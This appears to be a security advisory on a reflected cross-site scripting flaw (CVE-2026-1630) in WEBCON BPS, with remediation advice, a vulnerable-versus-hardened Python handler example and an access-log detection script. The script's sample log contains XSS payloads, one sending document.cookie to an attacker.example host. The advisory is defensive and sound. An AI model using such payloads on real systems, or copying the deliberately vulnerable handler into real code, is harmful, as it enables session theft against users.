Full Report
A reflected Cross-Site Scripting vulnerability (CVE-2026-1630) has been found in WEBCON BPS software.
Analysis Summary
# Vulnerability: Reflected Cross-Site Scripting (XSS) in WEBCON BPS
## CVE Details
- **CVE ID:** CVE-2026-1630
- **CVSS Score:** Not provided in the source advisory. (Reflected XSS is typically rated 5.4 to 6.1 Medium; 6.1 corresponds to CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N. This is a typical value, not a vendor or CERT assessment.)
- **CWE:** CWE-79 (Improper Neutralization of Input During Web Page Generation)
## Affected Systems
- **Products:** WEBCON BPS (Business Process Suite)
- **Versions:**
  - 2026.1.1.45 up to, but not including, 2026.1.3.109
  - 2025.1.1.87 up to, but not including, 2025.2.1.293
- **Configurations:** Systems utilizing the `/openinmobileapp` endpoint.
## Vulnerability Description
WEBCON BPS is susceptible to a reflected Cross-Site Scripting (XSS) vulnerability. The `/openinmobileapp` endpoint echoes request parameters into its response without sufficient sanitization or output encoding, so a remote attacker can craft a URL whose parameter value carries script. When a victim opens that link (for example from a phishing e-mail or chat message), the payload is reflected back and executes in the victim's browser within the application's origin; if the victim is logged in to WEBCON BPS, the script runs with that authenticated session and can act on the victim's behalf.
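To make the CWE-79 pattern concrete, the following Python example (added here; it is not WEBCON code, and the advisory does not describe the real `/openinmobileapp` parameter names or response layout, so the `target` parameter and the page template are assumptions) places a deliberately vulnerable handler next to a hardened one and includes the kind of reflection probe a scanner uses to tell them apart. It also shows why encoding alone is not enough in an attribute context: a `javascript:` URL survives HTML-escaping, so the `href` value is additionally restricted to absolute http(s) URLs.

```python
"""Added example, not WEBCON code: a reflected-XSS handler beside a hardened one.

Assumptions (not from the advisory): the endpoint reads a `target` query
parameter and reflects it into a link and a text node on the page.
"""
from html import escape
from urllib.parse import parse_qs, quote, urlsplit

# Assumed response layout: the parameter lands in an attribute context and a text context.
PAGE = '<html><body><a href="{href}">Open in mobile app</a><p>Opening {text}</p></body></html>'

ALLOWED_SCHEMES = {"http", "https"}


def _target_param(url: str) -> str:
    """Pull the `target` query parameter out of the request URL (percent-decoded)."""
    return parse_qs(urlsplit(url).query).get("target", [""])[0]


def render_vulnerable(url: str) -> str:
    """CWE-79: the parameter goes into the HTML verbatim, so `<script>` or
    `"><img onerror=...` injected by the attacker is rendered and executed."""
    value = _target_param(url)
    return PAGE.format(href=value, text=value)


def safe_href(value: str) -> str:
    """Attribute context needs more than encoding: `javascript:alert(1)` is a
    harmless-looking string after HTML-escaping but still runs as a link target,
    so only absolute http(s) URLs are allowed into href; anything else becomes '#'."""
    parts = urlsplit(value)
    if parts.scheme.lower() in ALLOWED_SCHEMES and parts.netloc:
        return escape(value, quote=True)
    return "#"


def render_hardened(url: str) -> str:
    """Same page, with context-appropriate output encoding and URL validation."""
    value = _target_param(url)
    return PAGE.format(href=safe_href(value), text=escape(value, quote=True))


# Harmless marker containing the characters an HTML encoder must neutralise.
CANARY = "xssprobe<\">'"


def reflects_unencoded(render, canary: str = CANARY) -> bool:
    """Scanner-style check: request the page with the canary in the parameter and
    see whether it comes back byte-for-byte, i.e. without any output encoding."""
    url = "https://bps.example.invalid/openinmobileapp?target=" + quote(canary)
    return canary in render(url)


if __name__ == "__main__":
    for name, handler in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        print(f"{name}: reflects canary unencoded = {reflects_unencoded(handler)}")
```

The canary deliberately contains no executable script; a scanner only needs to observe that `<`, `"` and `'` survive the round trip to conclude that a real payload would too.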
## Exploitation
- **Status:** No public reports of exploitation in the wild; the issue was handled through coordinated disclosure (see the CERT Polska advisory in References).
- **Complexity:** Low (a single crafted URL suffices)
- **Attack Vector:** Network (Remote)
- **User Interaction:** Required (the victim must open an attacker-supplied link while, for full impact, logged in to WEBCON BPS)
## Impact
- **Confidentiality:** High (script runs in the application's origin, so it can read page content and any cookie not flagged HttpOnly and exfiltrate data reachable through the victim's session; session cookies marked HttpOnly cannot be read directly but the session can still be used)
- **Integrity:** High (ability to issue requests to the application as the victim, or to modify what the victim sees on the page)
- **Availability:** None/Low
## Remediation
### Patches
The vendor has released security updates to address this flaw. Administrators should update to the following version or later on the branch they run:
- **WEBCON BPS 2026.1.3.109**
- **WEBCON BPS 2025.2.1.293**
### Workarounds
No vendor workaround was provided; applying the patch is the only complete fix. As defense in depth, a Content Security Policy that does not allow inline script (no `'unsafe-inline'` in `script-src`) blocks the most common reflected payloads, and WAF rules that flag script-like content in `/openinmobileapp` parameters can block or at least log attempts. Neither substitutes for the update: a CSP must be set by the application or a reverse proxy in front of it and may break legitimate inline scripts, and WAF filters are routinely bypassed with encoding variants.
## Detection
- **Indicators of Compromise:** Script-like or percent-encoded content (for example `<script`, `onerror=`, `javascript:`, `%3Cscript`) in the query string of requests to `/openinmobileapp` in web-server or reverse-proxy access logs. Access logs record only the request line, so parameters sent in a POST body will not appear there; decode the query string (including double encoding) before pattern matching.
- **Detection Methods:** Vulnerability scanners and web application security testing tools can confirm the flaw by sending a harmless marker string in the affected parameter and checking whether it is returned unencoded in the response. A version check against the fixed builds listed above is the simplest indicator of exposure.
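The following Python example (added here; it is not part of the advisory or of WEBCON's tooling) runs the access-log check described above over a few constructed Combined Log Format lines: it restricts attention to `/openinmobileapp`, decodes each query parameter through repeated percent-decoding so double-encoded payloads are caught, and applies a small heuristic pattern set. The sample includes a POST with no query string to show the limitation noted above: its body is not in the log, so nothing is found for it.

```python
"""Added example, not from the advisory or WEBCON: triage of web-server access
logs for reflected-XSS attempts against /openinmobileapp.

The log lines below are constructed for illustration (Combined Log Format).
Access logs record only the request line, so only GET query strings are
visible; a payload sent in a POST body will not be found this way.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample: one benign request, two attack attempts (the second
# double-encoded), one unrelated path, and a POST whose body the log cannot show.
SAMPLE_LOG = """\
203.0.113.10 - - [12/May/2026:10:01:02 +0000] "GET /openinmobileapp?target=https%3A%2F%2Fbps.example%2Fapp%2F42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [12/May/2026:10:01:09 +0000] "GET /openinmobileapp?target=%3Cscript%3Elocation%3D%27https%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 640 "-" "Mozilla/5.0"
198.51.100.7 - - [12/May/2026:10:01:15 +0000] "GET /openinmobileapp?target=%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 640 "-" "Mozilla/5.0"
203.0.113.11 - - [12/May/2026:10:02:00 +0000] "GET /api/tasks?filter=open HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.8 - - [12/May/2026:10:03:00 +0000] "POST /openinmobileapp HTTP/1.1" 200 640 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Heuristic indicators of script injection, applied after decoding. This is triage,
# not proof: tune to your traffic, and review any legitimate values containing "<".
SUSPICIOUS = re.compile(
    r"<\s*/?\s*(?:script|img|svg|iframe|object|embed|body|a|input)\b"  # tag injection
    r"|(?:^|[\s\"'/<])on[a-z]+\s*="                                   # event-handler attribute
    r"|javascript\s*:"                                                # javascript: URL
    r"|\b(?:alert|prompt|confirm|eval)\s*\("                          # common probe functions
    r"|document\.cookie",
    re.IGNORECASE,
)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded payloads such as
    %253Cscript%253E are normalised to <script> before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_access_log(log_text: str, endpoint: str = "/openinmobileapp") -> list[dict]:
    """Return one record per suspicious query parameter sent to `endpoint`."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["path"])
        if parts.path.lower() != endpoint:
            continue
        # parse_qsl decodes one layer of percent-encoding; fully_decode strips any more.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            payload = fully_decode(value)
            if SUSPICIOUS.search(payload):
                hits.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                             "param": name, "payload": payload})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['param']}={hit['payload']!r}")
```

On the sample data the scan reports the two requests from 198.51.100.7 and nothing for the benign deep link, the unrelated path or the POST. In production, feed it the reverse proxy's logs as well as the application server's, since the two may record request lines differently.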
## References
- CERT Polska Advisory: hxxps[://]cert[.]pl/en/posts/2026/05/CVE-2026-1630/
- CVE Record: hxxps[://]www[.]cve[.]org/CVERecord?id=CVE-2026-1630
- CWE-79 Definition: hxxps[://]cwe[.]mitre[.]org/data/definitions/79[.]html